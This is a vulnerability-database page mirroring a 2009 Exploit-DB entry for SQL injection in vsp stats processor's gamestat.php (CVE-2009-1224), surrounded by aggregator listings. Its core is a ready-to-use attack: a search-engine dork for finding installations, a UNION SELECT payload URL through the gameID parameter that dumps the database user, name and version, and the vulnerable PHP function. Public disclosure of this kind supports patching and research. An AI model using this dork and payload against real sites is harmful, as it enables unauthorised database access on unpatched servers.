Lucene search
+L

vsp stats processor 0.45 - 'gamestat.php?gameID' SQL Injection

🗓️ 31 Mar 2009 00:00:00Reported by Dimi4Type 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 113 Views

Vulnerability in vsp stats processor 0.4

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-1224
31 Mar 200900:00
circl
cve
CVE
CVE-2009-1224
2 Apr 200915:00
cve
cvelist
Cvelist
CVE-2009-1224
2 Apr 200915:00
cvelist
euvd
EUVD
EUVD-2009-1223
7 Oct 202500:30
euvd
nvd
NVD
CVE-2009-1224
2 Apr 200915:30
nvd
prion
Prion
Sql injection
2 Apr 200915:30
prion
########################################
#                                         #
# Product : vsp stats processor           #
# Version : all                           #
# Dork : "powered by vsp stats processor" #
# Site: http://www.scivox.net/vsp/        #
# Found by: Dimi4                         #
# Date : 31.03.09                         #
# Greetz: antichat                        #
#                                         #
########################################

SQL-injection
[+] URL: http://target.com/vsp-core/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x203a20,user(),database(),version()),2/*&config=cfg-default.php
[+] Output: <option> {DATA} </option>

Bug Function: (vsp-core\pub\themes\bismarck\gamestat.php 540-558 lines)

 function getStatsGame()
{
  global $db;
  global $ggame;
  $sql = "select name, value
            from {$GLOBALS['cfg']['db']['table_prefix']}gamedata
            where gameID=$GLOBALS[gameID]
         ";

  //echo $sql;
  $rs = $db->Execute($sql);

.....
}


(c) Dimi4, 2009 greetz to antichat

# milw0rm.com [2009-03-31]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 Mar 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.00947
113